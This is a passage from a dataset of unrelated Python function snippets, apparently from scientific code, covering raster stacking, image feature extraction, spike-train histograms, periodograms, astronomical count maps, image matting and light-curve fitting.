tvec=result['tvec'], mode='constant', bgval=0, order=1)\n ones_transformed=np.zeros_like(template_raster)\n ones_transformed[np.where(img_transformed>0)]=1\n print(ones_transformed)\n \n print(np.mean(ones_transformed), 
np.max(ones_transformed), np.min(ones_transformed))\n print(ones_transformed[np.where(ones_transformed>0)])\n print(np.min(ones_transformed[np.where(ones_transformed>0)]))\n print(np.max(ones_transformed[np.where(ones_transformed>0)]))\n\n plt.imshow(ones_transformed)\n plt.show()\n plt.close()\n \n # ones_transformed=cut_transformed_array_borders(ones_transformed)\n \n avg_raster=avg_raster+ones_transformed\n # ird.imshow(template_raster, tif_raster, img_transformed)\n \n new_raster=new_raster+img_transformed\n \n # new_raster=new_raster+template_raster \n # new_raster=new_raster/len(tifs)\n\n gtz=np.where(avg_raster>0)\n \n\n \n\n \n \n plt.imshow(new_raster)\n plt.show()\n plt.close()\n # gdal_array.SaveArray(new_raster, tifs[0][:-4]+\"_not_abvertaghe_stacked_.tiff\")\n new_raster[gtz]=new_raster[gtz]/avg_raster[gtz] \n gdal_array.SaveArray(new_raster, tifs[0][:-4]+\"_stacked_.tiff\")\n plt.imshow(new_raster)\n plt.savefig(\"test.tif\", dpi=800)\n plt.show()\n plt.close()\n\n def discrete_cmap(N, base_cmap=None):\n \"\"\"Create an N-bin discrete colormap from the specified input map\"\"\"\n \n # Note that if base_cmap is a string or None, you can simply do\n # return plt.cm.get_cmap(base_cmap, N)\n # The following works for string, None, or a colormap instance:\n \n base = plt.cm.get_cmap(base_cmap)\n color_list = base(np.linspace(0, 1, N))\n cmap_name = base.name + str(N)\n return base.from_list(cmap_name, color_list, N)\n\n cmap=discrete_cmap(int(avg_raster.max())+1, base_cmap=\"ocean\") \n \n norm=mpl.colors.BoundaryNorm(np.arange(-0.5,int(avg_raster.max()+1)), cmap.N)\n fig=plt.figure()\n fig.set_size_inches(5,4)\n ax=fig.add_subplot(111)\n data=ax.matshow(avg_raster, cmap=cmap, norm=norm)\n fig.colorbar(data, ticks=np.linspace(0,int(avg_raster.max()),int(avg_raster.max()+1)), drawedges=True)\n\n plt.show()\n plt.close()\n\n\n # gdal_array.SaveArray(new_raster, tifs[0][:-4]+\"_stacked_.tiff\")", "def pick_triplets_images(images, n_triplets):\n\n indices = _pick_triplets(len(images), n_triplets)\n\n n_samples = len(indices)\n\n n_rows, n_cols, n_channels = images[0].shape\n\n images_samples = np.zeros((n_samples,n_rows, n_cols, n_channels), dtype = np.uint8)\n\n for i, index in enumerate(indices):\n images_samples[i] = images[index]\n\n return images_samples", "def extract_features_2d(\n dim,\n img,\n n_sigmas,\n intensity=True,\n edges=True,\n texture=True,\n sigma_min=0.5,\n sigma_max=16\n):\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Extracting features from channel %i' % (dim))\n\n # computations are faster as float32\n img = img_as_float32(img)\n\n sigmas = np.logspace(\n np.log2(sigma_min),\n np.log2(sigma_max),\n num=n_sigmas, #int(np.log2(sigma_max) - np.log2(sigma_min) + 1),\n base=2,\n endpoint=True,\n )\n\n if (psutil.virtual_memory()[0]>10000000000) & (psutil.virtual_memory()[2]<50): #>10GB and <50% utilization\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Extracting features in parallel')\n logging.info('Total RAM: %i' % (psutil.virtual_memory()[0]))\n logging.info('percent RAM usage: %f' % (psutil.virtual_memory()[2]))\n\n all_results = Parallel(n_jobs=-2, verbose=0)(delayed(features_sigma)(img, sigma, intensity=intensity, edges=edges, texture=texture) for sigma in sigmas)\n else:\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Extracting features in series')\n logging.info('Total RAM: %i' % (psutil.virtual_memory()[0]))\n logging.info('percent RAM usage: %f' % 
(psutil.virtual_memory()[2]))\n\n n_sigmas = len(sigmas)\n all_results = [\n features_sigma(img, sigma, intensity=intensity, edges=edges, texture=texture)\n for sigma in sigmas\n ]\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Features from channel %i for all scales' % (dim))\n\n return list(itertools.chain.from_iterable(all_results))", "def update_for_in_trap(self, t, traps): #******\n sources = traps.param['source_locations'] #Of format [(0,0),]\n for trap_num, trap_loc in enumerate(sources):\n dist_vals = distance((self.x_position, self.y_position),trap_loc)\n mask_trapped = dist_vals < traps.param['trap_radius']\n self.mode[mask_trapped] = self.Mode_Trapped\n self.trap_num[mask_trapped] = trap_num\n self.x_trap_loc[mask_trapped] = trap_loc[0]\n self.y_trap_loc[mask_trapped] = trap_loc[1]\n self.x_velocity[mask_trapped] = 0.0\n self.y_velocity[mask_trapped] = 0.0\n\n # Get time stamp for newly trapped flies\n mask_newly_trapped = mask_trapped & (self.t_in_trap == scipy.inf)\n self.t_in_trap[mask_newly_trapped] = t", "def extract_templates(im, interactive = False):\n\n im = np.flipud(im)\n# tmp = cv2.medianBlur(im, 5)\n# tmp = cv2.threshold(tmp, 255*0.65, 255, cv2.THRESH_BINARY)[1]\n\n im_filtered = filter_specgram(im, interactive)\n _, contours, _ = cv2.findContours(\n im_filtered,\n cv2.RETR_LIST,\n cv2.CHAIN_APPROX_SIMPLE\n )\n\n templates = []\n\n im_dbg_template_rejected = None\n im_dbg_template_overlay = None\n if interactive:\n im_dbg_template_rejected = im.copy()\n im_dbg_template_overlay = im.copy()\n\n #im_dbg_template_overlay *= 255/im_dbg_template_overlay.max()\n\n\n # apply trunc threshold\n # apply gaussian blur\n # apply binary threshold\n # remove small blobs\n # remove huge blobs\n # for each blob, check surrounding blobs within given radius and add \n # (how to choose which to add? 
what radius?\n smallest = -1\n average_val = np.average(im)\n print 'average: {}'.format(average_val)\n\n for i in xrange(len(contours)):\n r = cv2.boundingRect(contours[i])\n\n left = max(0, r[0] - 10)\n top = max(0, r[1] - 10)\n right = min(len(im[0]), r[0] + r[2] + 10)\n bottom = min(len(im), r[1] + r[3] + 10)\n\n area = r[2] * r[3]\n\n #TODO: use average values from sgram?\n if area < 50 or area > 10000: # : continue\n #if area > 10000:\n if not interactive: continue\n# cv2.putText(im_dbg_template_rejected, '{}'.format(area),\n# (left, top), cv2.FONT_HERSHEY_PLAIN, 1.0,\n# int(np.max(im_dbg_template_rejected)))\n cv2.rectangle(im_dbg_template_rejected, (left,top), (right,bottom), int(np.max(im_dbg_template_rejected)), 1)\n continue\n\n if smallest == -1 or area < smallest: smallest = area\n\n x = im[top:bottom, left:right]\n #x = im[r[1]:r[1]+r[3], r[0]:r[0]+r[2]]\n if np.min(x) >= average_val:\n if not interactive: continue\n cv2.putText(im_dbg_template_rejected, 'v:{}'.format(np.average(x)), (left, top), cv2.FONT_HERSHEY_PLAIN, 1.0, int(np.max(im_dbg_template_rejected)))\n cv2.rectangle(im_dbg_template_rejected, (left,top), (right,bottom), int(np.max(im_dbg_template_rejected)), 1)\n continue\n x = cv2.GaussianBlur(x, (0,0), 1.5)\n templates.append(x)\n\n if interactive:\n cv2.rectangle(im_dbg_template_overlay, (left, top), (right, bottom), int(np.max(im_dbg_template_overlay)), 1)\n #cv2.rectangle(im_dbg_template_overlay, (r[0]-10, r[1]-10), (r[0]+r[2]+10, r[1]+r[3]+10), (255,0,0), 1)\n if interactive:\n plotMultiple([im_dbg_template_overlay, im_dbg_template_rejected],\n #plotMultiple([im_filtered, im_dbg_template_rejected],\n None,\n ['templates', 'rejected'])\n\n\n# cv2.namedWindow('orig')\n# cv2.imshow('orig', im_dbg_template_overlay)\n# cv2.namedWindow('rejected')\n# cv2.imshow('rejected', im_dbg_template_rejected)\n # plt.imshow(im_dbg_template_overlay, aspect='auto')\n # plt.show()\n print 'smallest: {}'.format(smallest)\n plt_(im_dbg_template_rejected,'reject')\n plt_(im_dbg_template_overlay,'accept')\n# while cv2.waitKey(0) != ord('n'):\n# pass\n\n return templates", "def dump_psth_peaks(ffname, outprefix, celltype, window=100e-3, binwidth=5e-3):\n with open('{}_psth_{}_{}ms_window_{}ms_bins.csv'.format(outprefix, celltype, window*1e3, binwidth*1e3), 'wb') as fd:\n writer = csv.writer(fd, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n dbcnt_flist = get_dbcnt_dict(ffname)\n bins = np.arange(-window / 2.0, window / 2.0 + 0.5 * binwidth, binwidth)\n writer.writerow(['dbcount', 'filename'] + list(np.asarray(np.round(bins[1:]*1e3), dtype=int)))\n for dbcnt, flist in dbcnt_flist.items():\n for fname in flist:\n data = TraubData(makepath(fname))\n pop_train_list = []\n bgtimes, probetimes = get_stim_times(data, correct_tcr=True)\n if (len(bgtimes) == 0) and (len(probetimes) == 0):\n print 'EE: {} has no TCR spiking on stimulus.'.format(fname)\n continue\n stim_times = np.concatenate((bgtimes, probetimes))\n stim_times.sort()\n # print '###', stim_times\n for cell, train in data.spikes.items():\n if cell.startswith(celltype):\n pop_train_list.append(train)\n pop_train = np.concatenate(pop_train_list)\n pop_train.sort()\n \n bgpsth, b = psth(pop_train, stim_times, window=window, bins=bins)\n bgpsth /= (data.cellcounts._asdict()[celltype] * binwidth)\n writer.writerow([dbcnt, fname] + list(bgpsth))", "def peaks_mc(t, y, e, thresh=0, N_trials=5000, N_peaks=None, **pgram_kwargs):\n tstart = timeit.default_timer()\n\n def do_trial(**kwargs):\n y_jig = np.random.normal(y, e)\n 
periods, power = lombscargle(t, y_jig, **kwargs)\n peaks = peak_indices(power, thresh=thresh)\n pk_periods = periods[peaks]\n pk_power = power[peaks]\n if N_peaks is not None and pk_periods.size >= N_peaks:\n pk_periods = pk_periods[0:N_peaks]\n pk_power = power[0:N_peaks]\n return periods, pk_periods, pk_power\n \n # Do one trial to get the periods\n periods, mc_pk_periods, mc_pk_power = do_trial(**pgram_kwargs)\n \n # Now do the rest\n for i in range(N_trials - 1):\n periods, pk_periods, pk_power = do_trial(periods=periods)\n mc_pk_periods = np.append(mc_pk_periods, pk_periods)\n mc_pk_power = np.append(mc_pk_power, pk_power)\n tend = timeit.default_timer()\n print(\"trials=%i peaks=%i thresh=%0.3g\" % (N_trials, mc_pk_periods.size, thresh))\n print(\"%i trials of %i samples to %i periods in %f s\" % \\\n (N_trials, y.size, periods.size, tend - tstart))\n return mc_pk_periods, mc_pk_power", "def tqumap_homog_noise( pix, nlev_t, nlev_p):\n nx, dx, ny, dy = pix.nx, pix.dx, pix.ny, pix.dy\n \n ret = maps.tqumap( nx, dx, ny=ny, dy=dy )\n ret.tmap += np.random.standard_normal(ret.tmap.shape) * nlev_t / (180.*60./np.pi*np.sqrt(ret.dx * ret.dy))\n ret.qmap += np.random.standard_normal(ret.qmap.shape) * nlev_p / (180.*60./np.pi*np.sqrt(ret.dx * ret.dy))\n ret.umap += np.random.standard_normal(ret.umap.shape) * nlev_p / (180.*60./np.pi*np.sqrt(ret.dx * ret.dy))\n return ret", "def test_gaussian():\n generator = SignalGenerator()\n data = generator.random_gaussian(means=[1, 0, -1], stds=[0.1, 0.1, 0.1])\n freq_features = FrequencyFeature(data, sr=50)\n freq_features.fft().peaks()\n top_n = range(1, 11)\n top_n_dominant_frequencies = np.concatenate(\n list(map(freq_features.dominant_frequency_power, top_n)), axis=0)\n std_top_n_dfs = np.std(top_n_dominant_frequencies, axis=0)\n assert np.all(std_top_n_dfs < 0.001)", "def countmap(band,skypos,tranges,skyrange,width=False,height=False,\n\t\t\t verbose=0,tscale=1000.,memlight=False,hdu=False,retries=20):\n\timsz = gxt.deg2pix(skypos,skyrange)\n\tcount = np.zeros(imsz)\n\tfor trange in tranges:\n\t\t# If memlight is requested, break the integration into\n\t\t# smaller chunks.\n\t\tstep = memlight if memlight else trange[1]-trange[0]\n\t\tfor i in np.arange(trange[0],trange[1],step):\n\t\t\tt0,t1=i,i+step\n\t\t\tif verbose:\n\t\t\t\tprint_inline('Coadding '+str(t0)+' to '+str(t1))\n\t\t\tevents = gQuery.getArray(gQuery.rect(band,skypos[0],skypos[1],t0,t1,\n\t\t\t\t\t\t\t\t\t\t\t\t skyrange[0],skyrange[1]),\n\t\t\t\t\t\t\t\t\t verbose=verbose,retries=retries)\n\n\t\t\t# Check that there is actually data here.\n\t\t\tif not events:\n\t\t\t\tif verbose>1:\n\t\t\t\t\tprint \"No data in \"+str([t0,t1])\n\t\t\t\tcontinue\n\n\t\t\ttimes = np.array(events,dtype='float64')[:,0 ]/tscale\n\t\t\tcoo =\tnp.array(events,dtype='float64')[:,1:]\n\n\t\t\t# If there's no data, return a blank image.\n\t\t\tif len(coo)==0:\n\t\t\t\tif verbose:\n\t\t\t\t\tprint 'No data in this frame: '+str([t0,t1])\n\t\t\t\tcontinue\n\n\t\t\t# Define World Coordinate System (WCS)\n\t\t\twcs = define_wcs(skypos,skyrange,width=False,height=False)\n\n\t\t\t# Map the sky coordinates onto the focal plane\n\t\t\tfoc = wcs.sip_pix2foc(wcs.wcs_world2pix(coo,1),1)\n\n\t\t\t# Bin the events into actual image pixels\n\t\t\tH,xedges,yedges=np.histogram2d(foc[:,1]-0.5,foc[:,0]-0.5,\n\t\t\t\t\t\t\t\tbins=imsz,range=([ [0,imsz[0]],[0,imsz[1]] ]))\n\t\t\tcount += H\n\n\treturn count", "def airgaps_from_sequence(self, seq_model, tfrms):\n for e in self.elements:\n if isinstance(e, AirGap):\n return # found 
an AirGap, model probably OK\n\n num_elements = 0\n seq_model = self.opt_model.seq_model\n for i, g in enumerate(seq_model.gaps):\n if g.medium.name().lower() == 'air':\n if i > 0:\n s = seq_model.ifcs[i]\n tfrm = tfrms[i]\n self.process_airgap(seq_model, i, g, s, tfrm,\n num_elements, add_ele=False)", "def find_peaks_(image):\n\n height, width = image.shape[:2]\n img_matrix = [sum(i)/len(i) for i in image]\n x=[i for i in range(height)]\n y = [255-i for i in img_matrix]\n y = gaussian_filter(y, sigma=20)\n maxs, _ = find_peaks(y)\n maxs = maxs.tolist()\n\n return maxs", "def make_td_images(td, num_spikes, step_factor=1):\n assert isinstance(td, ev.Events)\n assert isinstance(num_spikes, int)\n assert num_spikes > 0\n assert step_factor > 0\n\n # with timer.Timer() as my_timer:\n event_offset = 0\n images = []\n while event_offset + num_spikes < td.data.size:\n image = np.zeros((td.height, td.width), dtype=np.uint8)\n unique_spike_count = 0\n index_ptr = event_offset\n while (unique_spike_count < num_spikes) & (index_ptr < td.data.size):\n event = td.data[index_ptr]\n y = event.y\n x = event.x\n if image[y, x] == 0:\n image[y, x] = 255\n unique_spike_count += 1\n\n index_ptr += 1\n\n # cv2.imshow('img', img)\n # cv2.waitKey(1)\n if unique_spike_count < num_spikes:\n break\n\n images.append(image)\n\n # offset next image\n total_spikes_traversed = index_ptr - event_offset\n event_offset += math.floor(total_spikes_traversed * step_factor) + 1\n # print 'Making images out of bin file took %s seconds' % my_timer.secs\n\n return images", "def transform(self, imgList):\n res = []\n for img in tqdm(imgList):\n y_mean = np.mean(img, axis=1)\n self.get_filtration(y_mean)\n seg = self.get_segments()\n seg = sorted(seg, key=lambda x:x[0])\n res.append(seg)\n return res", "def getstats(img, thresholds):\n number = np.zeros(img.shape, np.float64)\n ev = np.zeros(img.shape, np.float64)\n scatter = np.zeros(img.shape, np.float64)\n for n, s, low, high, evs in thresholds:\n for i in numba.prange(img.shape[0]):\n for j in numba.prange(img.shape[1]):\n if (low < img[i, j]) and (img[i, j] < high):\n scatter[i, j] = s\n number[i, j] = n\n ev[i, j] = img[i, j] - evs\n return ev, number, scatter", "def multi_sigma_noise_sampling(qubit, tstep, sigma_array, num_samples):\n\n noise_samples0 = np.linspace(-5*sigma_array[-1], 5*sigma_array[-1], num_samples)\n average_chi_array0, raw_chi_array0 = process_noise(qubit, tstep, noise_samples0, sigma_array)\n \n converge_value = 1.0\n num_runs = 1\n # Used to progressively refine the sampling space\n sig_index = -1\n\n while converge_value > 1e-7:\n if num_runs % 3 == 0:\n noise_samples1 = wing_doubling(noise_samples0, sigma_array[sig_index])\n else:\n noise_samples1 = two_sigma_doubling(noise_samples0, sigma_array[sig_index])\n average_chi_array1, raw_chi_array1 = process_noise(qubit, tstep, noise_samples1, sigma_array)\n\n converge_array = np.zeros((len(sigma_array)))\n\n diff_matrix = average_chi_array1 - average_chi_array0\n converge_array = np.real(np.sqrt(\n np.einsum('ijj',\n np.einsum('ijk,ikm->ijm', diff_matrix, \n np.einsum('ikj', diff_matrix.conj())))))\n \n # Ensure that all of the individual chi-matrices have converged\n converge_value = np.max(converge_array)\n for i, norm in reversed(list(enumerate(converge_array))):\n if norm < 1e-8:\n sig_index = i\n break\n\n noise_samples0 = noise_samples1\n average_chi_array0 = average_chi_array1\n raw_chi_array0 = raw_chi_array1\n print(converge_array)\n print(num_runs)\n num_runs += 1\n return len(noise_samples1), 
average_chi_array1", "def get_spike_times_ps(nn, n_ps=1, frac=1.):\n sp = []\n n = 0\n for gr in nn.p_ass_index[n_ps]:\n for nrn in gr[0:frac * len(gr)]:\n for t in nn.mon_spike_e[nrn]:\n sp.append((n, t))\n n += 1\n\n return sp", "def findRMpeaks(self, pix, threshold):\n\t\tsigma = np.std(self.getz(pix))\n\t\tdetections = []\n\t\tfor i, phi in enumerate(self.getz(pix)):\n \t\t \tif phi > threshold*sigma: detections.append(i)\n \t \treturn detections", "def get_amplitude_map(self, timeWindow=(0, 0.5)):\n\n windowIndex = np.logical_and(self.time>=timeWindow[0], self.time<=timeWindow[1])\n\n indON,indOFF,allAltPos,allAziPos = self._sort_index()\n\n ampON = np.zeros(indON.shape); ampON[:]=np.nan; ampOFF = ampON.copy()\n\n for i in np.ndindex(indON.shape):\n traceIndON = indON[i]; traceIndOFF = indOFF[i]\n if traceIndON is not None: ampON[i] = np.mean(np.mean(self.data[traceIndON]['traces'],axis=0)[windowIndex])\n if traceIndOFF is not None: ampOFF[i] = np.mean(np.mean(self.data[traceIndOFF]['traces'],axis=0)[windowIndex])\n\n return ampON, ampOFF, allAltPos, allAziPos", "def averageTrialsByTriggers(trigger_indices, np_data):\n trialLen = trigger_indices[1] -trigger_indices[0] -1\n data_avg = [] \n data_std = [] \n\n for i in trigger_indices:\n data_avg.append(numpy.average(np_data[i+1:i+trialLen-1])) \n data_std.append(numpy.std(np_data[i+1:i+trialLen-1])) \n \n return (data_avg, data_std)", "def bayes_matting(img, trimap, sigma_d=10, it=1):\n assert img.shape[:-1] == trimap.shape\n\n img = img / 255.0\n nrows, ncols = img.shape[:-1]\n\n # initial alpha guess\n alpha = np.zeros(trimap.shape)\n alpha[trimap == 255] = 1\n alpha[trimap == 128] = 0.5\n\n B = img[alpha == 0] # background pixel mask\n F = img[alpha == 1] # foreground pixel mask\n\n mean_B = np.mean(B, axis=0)\n cov_B = np.cov(B.T)\n mean_F = np.mean(F, axis=0)\n cov_F = np.cov(F.T)\n\n try:\n inv_cov_B = np.linalg.inv(cov_B)\n inv_cov_F = np.linalg.inv(cov_F)\n except LinAlgError:\n print(\"LinAlgError\")\n\n for i in range(it):\n print(\"Iteration {}\".format(i))\n for row in range(nrows):\n for col in range(ncols):\n if trimap[row, col] == 128:\n f, g = calculate_fg(img[row, col], alpha[row, col], mean_F, inv_cov_F, mean_B, inv_cov_B, sigma_d)\n alpha[row, col] = calculate_alpha(img[row, col], f, g)\n\n alpha = np.clip(alpha, 0, 1)\n\n return alpha", "def proc_modscag(fn_list, extent=None, t_srs=None):\n #Use cubic spline here for improve upsampling \n ds_list = warplib.memwarp_multi_fn(fn_list, res='min', extent=extent, t_srs=t_srs, r='cubicspline')\n stack_fn = os.path.splitext(fn_list[0])[0] + '_' + os.path.splitext(os.path.split(fn_list[-1])[1])[0] + '_stack_%i' % len(fn_list) \n #Create stack here - no need for most of mastack machinery, just make 3D array\n #Mask values greater than 100% (clouds, bad pixels, etc)\n ma_stack = np.ma.array([np.ma.masked_greater(iolib.ds_getma(ds), 100) for ds in np.array(ds_list)], dtype=np.uint8)\n\n stack_count = np.ma.masked_equal(ma_stack.count(axis=0), 0).astype(np.uint8)\n stack_count.set_fill_value(0)\n stack_min = ma_stack.min(axis=0).astype(np.uint8)\n stack_min.set_fill_value(0)\n stack_max = ma_stack.max(axis=0).astype(np.uint8)\n stack_max.set_fill_value(0)\n stack_med = np.ma.median(ma_stack, axis=0).astype(np.uint8)\n stack_med.set_fill_value(0)\n\n out_fn = stack_fn + '_count.tif'\n iolib.writeGTiff(stack_count, out_fn, ds_list[0])\n out_fn = stack_fn + '_max.tif'\n iolib.writeGTiff(stack_max, out_fn, ds_list[0])\n out_fn = stack_fn + '_min.tif'\n iolib.writeGTiff(stack_min, 
out_fn, ds_list[0])\n out_fn = stack_fn + '_med.tif'\n iolib.writeGTiff(stack_med, out_fn, ds_list[0])\n\n ds = gdal.Open(out_fn)\n return ds", "def all_feature_extractor(imgpath):\r\n\r\n image = cv2.imread(imgpath)\r\n image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\r\n\r\n # Extracting Gabor Features\r\n feature_dict = gabor_feature_extractor(image)\r\n\r\n feature_dict['Original'] = image\r\n\r\n entropy_img = entropy(image, disk(1))\r\n feature_dict['Entropy'] = entropy_img\r\n\r\n gaussian3_img = nd.gaussian_filter(image, sigma=3)\r\n feature_dict['Gaussian3'] = gaussian3_img\r\n\r\n gaussian7_img = nd.gaussian_filter(image, sigma=7)\r\n feature_dict['Gaussian7'] = gaussian7_img\r\n\r\n sobel_img = sobel(image)\r\n feature_dict['Sobel'] = sobel_img\r\n\r\n canny_edge_img = cv2.Canny(image, 100, 200)\r\n feature_dict['Canny'] = canny_edge_img\r\n\r\n robert_edge_img = roberts(image)\r\n feature_dict['Robert'] = robert_edge_img\r\n\r\n scharr_edge = scharr(image)\r\n feature_dict['Scharr'] = scharr_edge\r\n\r\n prewitt_edge = prewitt(image)\r\n feature_dict['Prewitt'] = prewitt_edge\r\n\r\n median_img = nd.median_filter(image, size=3)\r\n feature_dict['Median'] = median_img\r\n\r\n variance_img = nd.generic_filter(image, np.var, size=3)\r\n feature_dict['Variance'] = variance_img\r\n\r\n return feature_dict", "def get_stamps(full_image, Args):\n print (\"getting individual stamps\")\n nrows = int(np.ceil(Args.num / Args.num_columns)) # Total number of rows\n out_size = Args.out_size\n low = int(Args.in_size / 2 - out_size / 2)\n high = int(Args.in_size / 2 + out_size / 2)\n nStamp = (nrows, Args.num_columns)\n stampSize = Args.in_size\n s2 = np.hstack(np.split(full_image,nStamp[0])).T.reshape(nStamp[0]*nStamp[1],\n stampSize, stampSize)\n stamps = s2[:, low:high, low:high]\n return stamps", "def getstretchlimits(tiffile):\n im = gdal.Open(tiffile)\n imarray = np.dstack(\n [\n im.GetRasterBand(1).ReadAsArray(),\n im.GetRasterBand(2).ReadAsArray(),\n im.GetRasterBand(3).ReadAsArray(),\n ]\n )\n\n # imarray = imarray[imarray > 10] # get rid of the values near zero\n # return (imarray.dtype, imarray.shape)\n return [np.percentile(imarray, 1), np.percentile(imarray, 99)]", "def get_template_series(self, nb_images):\n\n # Tab for the series of images\n self.template = []\n\n # Tab\n temp = []\n\n # Make current position the zero position\n self.arm.set_to_zero([0, 1, 2])\n self.microscope.set_to_zero([0, 1, 2])\n\n # Take imges only in the template zone\n template = self.template_zone()\n height, width = template.shape[:2]\n\n # Tab of weight to detect where the pipette is\n weight = []\n\n # Detecting the tip\n for i in range(3):\n for j in range(3):\n if (i != 1) & (j != 1):\n # divide template zone into 8 images\n temp = template[i * height / 4:height / 2 + i * height / 4, j * width / 4:width / 2 + j * width / 4]\n\n # Search the tip using the number of darkest pixel in the image\n bin_edge, _ = np.histogram(temp.flatten())\n weight += [bin_edge.min()]\n else:\n # image is the center of template zone, do not consider to have functional get_withdraw_sign method\n weight += [-1]\n\n # pipette is in the image with the most darkest pixels\n index = weight.index(max(weight))\n j = index % 3\n i = index // 3\n\n # Update the position of the tip in image\n self.template_loc = [temp.shape[1] * (1 - j / 2.), temp.shape[0] * (1 - i / 2.)]\n\n # Get the series of template images at different height\n for k in range(nb_images):\n self.microscope.absolute_move(k - (nb_images - 1) / 2, 2)\n 
self.microscope.wait_motor_stop(2)\n time.sleep(1)\n img = self.template_zone()\n height, width = img.shape[:2]\n img = img[i * height / 4:height / 2 + i * height / 4, j * width / 4:width / 2 + j * width / 4]\n self.template += [img]\n\n # reset position at the end\n self.go_to_zero()\n pass", "def apply_gaussian(X, sigma):\n return np.array([ndimage.gaussian_filter(x, sigma) for x in X])", "def get_brightest_mean(self, num_pix=3):\n peak_x = np.zeros(\n [len(self.pixel_x)]) # Create blank arrays for peaks\n # rather than a dict (faster)\n peak_y = np.zeros(peak_x.shape)\n peak_amp = np.zeros(peak_x.shape)\n\n # Loop over all tels to take weighted average of pixel\n # positions This loop could maybe be replaced by an array\n # operation by a numpy wizard\n\n tel_num = 0\n for tel in self.image:\n top_index = self.image[tel].argsort()[-1 * num_pix:][::-1]\n print(top_index, self.pixel_x[tel][top_index],\n self.image[tel][top_index])\n weight = self.image[tel][top_index]\n weighted_x = self.pixel_x[tel][top_index] * weight\n weighted_y = self.pixel_y[tel][top_index] * weight\n\n ppx = np.sum(weighted_x) / np.sum(weight)\n ppy = np.sum(weighted_y) / np.sum(weight)\n\n peak_x[tel_num] = ppx # Fill up array\n peak_y[tel_num] = ppy\n peak_amp[tel_num] = np.sum(weight)\n tel_num += 1\n\n self.peak_x = peak_x # * unit # Add to class member\n self.peak_y = peak_y # * unit\n self.peak_amp = peak_amp", "def where_are_gaussians(img):\n list_of_sigmas = [40,30,20,10]\n mask=np.zeros(img.shape,dtype=bool)\n for sigma in list_of_sigmas:\n stack_to_remove,locs=find_gaussian(img.astype(np.uint8),sigma)\n w = stack_to_remove[:,:,0].shape[0]\n a,b=np.ogrid[-w/2:w/2,-w/2:w/2]\n for i in range(stack_to_remove.shape[2]):\n pt=(locs[0][i],locs[1][i])\n mask[pt[0]:pt[0]+w,pt[1]:pt[1]+w] = True\n return mask", "def getHists(img,bins=50):\n hists = np.array([])\n for i in range(3):#Images are loaded as three-dimensional matrices with three channels\n hists = np.append(hists,np.histogram(img[:,:,i], bins, density = True)[0])\n return hists", "def SIP(\n tpfs,\n sigma=5,\n min_period=10,\n max_period=100,\n nperiods=300,\n npca_components=2,\n aperture_threshold=3,\n sff=False,\n sff_kwargs={},\n):\n\n # Get the un-background subtracted data\n if hasattr(tpfs[0], \"flux_bkg\"):\n tpfs_uncorr = [\n (tpf + np.nan_to_num(tpf.flux_bkg))[\n np.isfinite(np.nansum(tpf.flux_bkg, axis=(1, 2)))\n ]\n for tpf in tpfs\n ]\n else:\n tpfs_uncorr = tpfs\n\n apers = [\n tpf.pipeline_mask\n if tpf.pipeline_mask.any()\n else tpf.create_threshold_mask(aperture_threshold)\n for tpf in tpfs_uncorr\n ]\n bkg_apers = [\n (~aper) & (np.nansum(tpf.flux, axis=0) != 0)\n for aper, tpf in zip(apers, tpfs_uncorr)\n ]\n lc = (\n lk.LightCurveCollection(\n [\n tpf.to_lightcurve(aperture_mask=aper)\n for tpf, aper in zip(tpfs_uncorr, apers)\n ]\n )\n .stitch(lambda x: x)\n .normalize()\n )\n lc.flux_err.value[~np.isfinite(lc.flux_err.value)] = np.nanmedian(lc.flux_err.value)\n\n # Run the same routines on the background pixels\n lc_bkg = (\n lk.LightCurveCollection(\n [\n tpf.to_lightcurve(aperture_mask=bkg_aper)\n for tpf, bkg_aper in zip(tpfs_uncorr, bkg_apers)\n ]\n )\n .stitch(lambda x: x)\n .normalize()\n )\n lc_bkg.flux_err.value[~np.isfinite(lc_bkg.flux_err.value)] = np.nanmedian(\n lc_bkg.flux_err.value\n )\n\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n bkgs = [\n lk.correctors.DesignMatrix(tpf.flux.value[:, bkg_aper], name=\"bkg\")\n .pca(npca_components)\n .append_constant()\n .to_sparse()\n for tpf, bkg_aper in 
zip(tpfs_uncorr, bkg_apers)\n ]\n for bkg in bkgs:\n bkg.prior_mu[-1] = 1\n bkg.prior_sigma[-1] = 0.1\n\n bkg.prior_mu[:-1] = 0\n bkg.prior_sigma[:-1] = 0.1\n\n # Split at the datadownlink\n bkgs = [\n bkg.split(list((np.where(np.diff(tpf.time.jd) > 0.3)[0] + 1)))\n for bkg, tpf in zip(bkgs, tpfs_uncorr)\n ]\n systematics_dm = vstack(bkgs)\n\n sigma_f_inv = sparse.csr_matrix(1 / lc.flux_err.value[:, None] ** 2)\n\n def fit_model(lc, mask=None, return_model=False):\n if mask is None:\n mask = np.ones(len(lc.flux.value), bool)\n sigma_w_inv = dm.X[mask].T.dot(dm.X[mask].multiply(sigma_f_inv[mask])).toarray()\n sigma_w_inv += np.diag(1.0 / dm.prior_sigma ** 2)\n\n B = dm.X[mask].T.dot((lc.flux.value[mask] / lc.flux_err.value[mask] ** 2))\n B += dm.prior_mu / dm.prior_sigma ** 2\n w = np.linalg.solve(sigma_w_inv, B)\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n werr = ((np.linalg.inv(sigma_w_inv)) ** 0.5).diagonal()\n if return_model:\n return dm.X.dot(w)\n return w, werr\n\n # Make a dummy design matrix\n period = 27\n ls_dm = lk.correctors.DesignMatrix(\n lombscargle.implementations.mle.design_matrix(\n lc.time.jd, frequency=1 / period, bias=False, nterms=1\n ),\n name=\"LS\",\n ).to_sparse()\n dm = lk.correctors.SparseDesignMatrixCollection(\n [systematics_dm, ls_dm]\n ).to_designmatrix(name=\"design_matrix\")\n\n if sff:\n sff_dm = []\n for tpf in tpfs_uncorr:\n s = lk.correctors.SFFCorrector(tpf.to_lightcurve())\n _ = s.correct(**sff_kwargs)\n sff_dm.append(s.dmc[\"sff\"].to_sparse())\n sff_dm = vstack(sff_dm)\n dm = lk.correctors.SparseDesignMatrixCollection([dm, sff_dm]).to_designmatrix(\n 